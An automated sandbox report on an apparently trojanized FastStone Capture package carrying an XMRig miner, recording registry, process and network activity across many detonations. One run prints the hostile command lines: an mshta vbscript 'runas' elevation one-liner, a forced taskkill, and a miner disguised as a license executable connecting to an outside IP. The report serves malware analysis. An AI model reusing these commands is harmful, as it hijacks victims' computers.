Malware Analysis Report

2025-06-16 06:55

Sample ID 241104-fd1jjatjay
Target 842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8
SHA256 842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8
Tags
discovery xmrig defense_evasion miner privilege_escalation evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral11, behavioral12, behavioral13, behavioral21, behavioral9, behavioral19, behavioral20, behavioral22, behavioral27, behavioral32, behavioral24, behavioral26, behavioral1, behavioral3, behavioral10, behavioral16, behavioral14, behavioral23, behavioral30, behavioral5, behavioral7, behavioral18, behavioral31, behavioral2, behavioral17, behavioral25, behavioral29, behavioral4, behavioral8, behavioral15, behavioral6, behavioral28 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8

Threat Level: Known bad

The file 842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8 was found to be: Known bad.

Malicious Activity Summary

discovery xmrig defense_evasion miner privilege_escalation evasion trojan

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Checks computer location settings

Checks whether UAC is enabled

Program crash

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious use of FindShellTrayWindow

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 04:46

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Network

N/A

Files

memory/1144-1-0x0000000000C30000-0x0000000000DCC000-memory.dmp

memory/1144-0-0x0000000000190000-0x0000000000191000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4788-0-0x0000000003190000-0x0000000003191000-memory.dmp

memory/4788-1-0x0000000000920000-0x0000000000ABC000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20241010-en

Max time kernel

12s

Max time network

19s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\CLSID = "{7D24573C-DB27-3694-BEC3-4263D335A781}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\ = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FSCapture-10.5-CN\\bin\\FSCPlugin05.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FriendlyName = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FilterData = 02000000000020000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000006175647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Network

N/A

Files

memory/2532-0-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2532-1-0x0000000000DA0000-0x0000000001330000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Network

N/A

Files

memory/2960-0-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2960-1-0x0000000001050000-0x0000000001286000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Network

N/A

Files

memory/1880-1-0x0000000000400000-0x00000000004A3000-memory.dmp

memory/1880-0-0x00000000001C0000-0x00000000001C1000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/1940-0-0x0000000002260000-0x0000000002261000-memory.dmp

memory/1940-1-0x0000000000400000-0x00000000004A3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/3676-0-0x0000000001780000-0x0000000001781000-memory.dmp

memory/3676-1-0x0000000000E10000-0x00000000013A0000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

147s

Max time network

155s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT","goto :target","","runas",1)(window.close)

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT" goto :target

C:\Windows\system32\taskkill.exe

taskkill /f /t /im FSCapture_license.exe

C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe

FSCapture_license.exe -o 104.168.101.23:34512 -t 7 -B -k

Network

Country Destination Domain Proto
US 104.168.101.23:34512 tcp

Files

memory/2772-1-0x00000000002F0000-0x0000000000310000-memory.dmp

memory/2772-2-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-3-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-4-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-5-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-6-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-7-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-8-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-9-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-10-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-11-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-12-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-13-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-14-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-15-0x0000000000400000-0x0000000000E80000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

140s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

memory/3532-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2008 wrote to memory of 764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2008 wrote to memory of 764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 764 -ip 764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4384 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2040 -ip 2040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 604

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

memory/2040-0-0x0000000000740000-0x000000000075E000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

141s

Max time network

125s

Command Line

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url

Signatures

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\System32\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
